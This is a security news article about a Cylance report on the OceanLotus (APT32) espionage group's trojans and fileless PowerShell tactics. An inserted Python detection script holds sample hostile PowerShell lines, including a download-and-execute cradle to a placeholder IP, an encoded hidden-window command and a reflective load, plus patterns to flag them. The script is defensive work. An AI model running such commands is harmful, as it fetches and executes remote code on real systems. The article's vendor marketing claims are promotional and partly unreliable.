    Cylance Report Reveals Malware and Tactics of OceanLotus Group and Weakness of Traditional AV

    By Tony Bradley on October 26, 2018 APT (Advanced Persistent Threats), Cyber Espionage, Malware, Remote Access Trojan, Security

    Exploits and attackers come in various forms. Just like crime in real life, there are vandals and people just trying to wreak havoc, there are petty thieves and lone wolf criminals, and there is organized crime—crime families that make a career out of cyber attacks. The OceanLotus Group—also referred to as APT32 or Cobalt Kitty—is one such family. Cylance recently released detailed security research to shed light on the tactics and techniques employed by OceanLotus Group to make it easier to identify and defend against attacks from them.

    The investigation by Cylance began during incident response and threat research activity at the end of 2017. Cylance researchers discovered several custom backdoors deployed by OceanLotus Group, along with evidence that the attackers were obfuscating payloads to carry out command and control (C2). They also determined that OceanLotus Group routinely uses PowerShell commands to download and deploy malware, which allows most of the malware to operate in memory with zero footprint on system storage.
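The in-memory PowerShell staging described above leaves little on disk, so the practical detection surface is PowerShell Script Block Logging (Event ID 4104). The following is an added example, not code from the Cylance report or from TechSpective: a small triage script that scores constructed sample script blocks against the building blocks of a download-and-execute chain (download cradle, Invoke-Expression, reflective assembly load, encoded command, hidden window); the rule names and sample entries are this example's own assumptions.

```python
import re
from typing import Dict, List

# Constructed sample Script Block Logging entries (Event ID 4104 style,
# flattened to one line each). These are made up for the example, not
# samples taken from the Cylance report.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.txt')",
    "powershell -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "[System.Reflection.Assembly]::Load($bytes) | Out-Null",
    "Import-Module ActiveDirectory; Get-ADUser -Filter *",
]

# Each rule pairs a label with a pattern for one building block of an
# in-memory download-and-execute chain.
RULES: Dict[str, re.Pattern] = {
    "download_cradle": re.compile(r"\.DownloadString\(|\.DownloadData\(|Invoke-WebRequest|iwr\s", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}


def score_script_block(block: str) -> Dict[str, object]:
    """Return which rules fired and a simple severity for one script block."""
    hits: List[str] = [name for name, pat in RULES.items() if pat.search(block)]
    # A download paired with an execution primitive is the fileless pattern
    # the report describes; rank it above any single indicator.
    chained = "download_cradle" in hits and "in_memory_exec" in hits
    if chained or "reflective_load" in hits:
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "none"
    return {"hits": hits, "severity": severity, "block": block}


def triage(blocks: List[str]) -> List[Dict[str, object]]:
    """Score every block and keep only those worth an analyst's attention."""
    return [r for r in (score_script_block(b) for b in blocks) if r["severity"] != "none"]


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{finding['severity']}] {finding['hits']}: {finding['block'][:70]}")
```

Feed it real 4104 message bodies exported from the event log and tune the rule set to the environment; admin scripts that legitimately use Invoke-WebRequest will need an allow list.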

    OceanLotus Group has developed a handful of RATs (remote access trojans), named after famous rats: Roland, Remy and Splinter. Cylance found that these RATs are carefully crafted to mimic legitimate DLLs of the victim organization, and that the malware C2 protocols are specifically tailored for each target as well.


    I spoke with Tom Bonner, Director of Threat Research for Cylance, about the report. He talked about how OceanLotus Group is able to surreptitiously stream video from compromised systems, and the risk that poses for organizations. He shared that Cylance developed this report to document the findings from Cylance research publicly, and to provide a thorough overview of how they operate, and how the protocols work for command and control so organizations—and other security vendors—can defend against these attacks more effectively.

    We also talked about the power of machine learning and the impact of predictive advantage. While many of the household names in antimalware and traditional security tools may struggle to identify and block these threats until or unless vendors capture a sample to reverse engineer and develop the appropriate signatures, Cylance has been able to detect all of the variants for more than two years. For some variants, the predictive advantage for Cylance is as much as three years. In other words, if you installed Cylance two years ago and never updated it again, it would still be able to protect you from these OceanLotus Group attacks.

    There are fundamental shifts that occur with technology, and sometimes it takes a while for the ripple effect to expand. But, just as we now say, “Who are the people who are still using 3.5-inch floppy disks?” or “Who are these people who still use fax machines?”, we will eventually—sooner rather than later—be saying, “Who are the people still using reactive antimalware solutions that require signatures?”

    Transformation takes time and there is an education process that must happen. Many organizations and individuals continue to buy traditional antimalware because it’s just what they’ve always done and they’re not aware of alternatives. That fundamental shift already happened, though, and the ripple effect of transitioning from legacy antimalware to more effective protection based on machine learning and artificial intelligence is just a matter of time.

    For more details on the OceanLotus Group, and the research on the malware tools and techniques they use, check out the complete Analysis of OceanLotus Group’s Latest Attack Tactics report.
